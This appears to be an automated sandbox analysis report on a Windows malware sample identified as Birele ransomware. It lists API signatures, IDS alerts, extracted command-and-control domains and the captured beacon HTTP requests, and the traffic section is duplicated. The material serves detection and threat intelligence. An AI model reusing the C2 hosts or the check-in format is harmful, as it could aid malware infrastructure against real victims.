Windows Analysis Report bd0wJGTae5.exe

Suricata IDS alerts for network traffic

Source: bd0wJGTae5.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040ABD9 FindFirstFileW,FindClose,	0_2_0040ABD9
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	0_2_00408248
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040ABD9 FindFirstFileW,FindClose,	2_2_0040ABD9
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	2_2_00408248

Networking

Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49733 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49734 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49743 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49745 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49742 -> 15.197.204.56:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49747 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49741 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49730 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49732 -> 15.197.204.56:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49744 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49748 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49731 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49838 -> 15.197.204.56:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49798 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49844 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49945 -> 15.197.204.56:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49951 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49851 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49899 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49958 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50024 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50028 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50023 -> 15.197.204.56:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50027 -> 15.197.204.56:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50026 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50008 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50025 -> 193.166.255.171:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: ht:/r.irsf.o/
Source: Malware configuration extractor	URLs: http://lousta.net/
Source: Malware configuration extractor	URLs: http://ow5dirasuek.com/
Source: Malware configuration extractor	URLs: ht:/w.irsf.o/
Source: Malware configuration extractor	URLs: http://mkkuei4kdsz.com/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /875/87.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /740/238.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /516/243.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /546/102.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: ow5dirasuek.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /497/157.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /527/338.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /457/998.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /434/722.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473447\|1730473447\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /78/665.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /956/959.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /781/119.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /945/466.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473466\|1730473447\|9\|2\|0
Source: global traffic	HTTP traffic detected: GET /547/467.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /528/262.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /353/421.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /537/167.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473484\|1730473447\|13\|3\|0
Source: global traffic	HTTP traffic detected: GET /508/485.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /333/645.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /978/939.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /292/164.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473503\|1730473447\|16\|4\|0
Source: global traffic	HTTP traffic detected: GET /263/482.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /908/776.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /785/70.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /763/794.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473522\|1730473447\|17\|5\|0
Source: global traffic	HTTP traffic detected: GET /734/112.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /562/252.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /488/933.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /776/947.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473541\|1730473447\|18\|6\|0

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 193.166.255.171 193.166.255.171
Source: Joe Sandbox View	IP Address: 52.34.198.229 52.34.198.229

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: FUNETASFI FUNETASFI
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: TANDEMUS TANDEMUS

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2016998 - Severity 1 - ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) : 192.168.2.4:49741 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49735
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49769

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_00407036 Sleep,DeleteFileW,CreateFileW,GetLastError,SetEndOfFile,InternetOpenUrlW,CloseHandle,InternetQueryDataAvailable,InternetReadFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,

0_2_00407036

Source: global traffic	HTTP traffic detected: GET /875/87.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /740/238.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /516/243.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /546/102.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: ow5dirasuek.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /497/157.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /527/338.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /457/998.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /434/722.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473447\|1730473447\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /78/665.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /956/959.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /781/119.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /945/466.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473466\|1730473447\|9\|2\|0
Source: global traffic	HTTP traffic detected: GET /547/467.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /528/262.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /353/421.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /537/167.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473484\|1730473447\|13\|3\|0
Source: global traffic	HTTP traffic detected: GET /508/485.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /333/645.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /978/939.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /292/164.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473503\|1730473447\|16\|4\|0
Source: global traffic	HTTP traffic detected: GET /263/482.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /908/776.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /785/70.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /763/794.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473522\|1730473447\|17\|5\|0
Source: global traffic	HTTP traffic detected: GET /734/112.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /562/252.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /488/933.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /776/947.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473541\|1730473447\|18\|6\|0

Source: global traffic	DNS traffic detected: DNS query: lousta.net
Source: global traffic	DNS traffic detected: DNS query: mkkuei4kdsz.com
Source: global traffic	DNS traffic detected: DNS query: ow5dirasuek.com

Source: omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.ne
Source: omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/263/482.html
Source: omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/263/482.html3
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/333/645.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.000000000069E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/497/157.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/497/157.htmlB
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/508/485.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/527/338.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/528/262.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/528/262.html9Tk-.
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/547/467.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/547/467.html4Wx
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/562/252.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/562/252.html.
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/562/252.htmlB
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/562/252.htmlY
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/562/252.htmlaba
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/562/252.htmlf
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/734/112.html
Source: omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/734/112.htmlk
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/740/238.html
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/740/238.htmlx
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/78/665.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/78/665.htmlH
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/875/87.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/908/776.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/908/776.htmlFTv-1
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/908/776.htmla0
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/956/959.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/956/959.html0473447
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/956/959.htmlw
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/353/421.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/353/421.html$E
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.000000000069E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/457/998.html
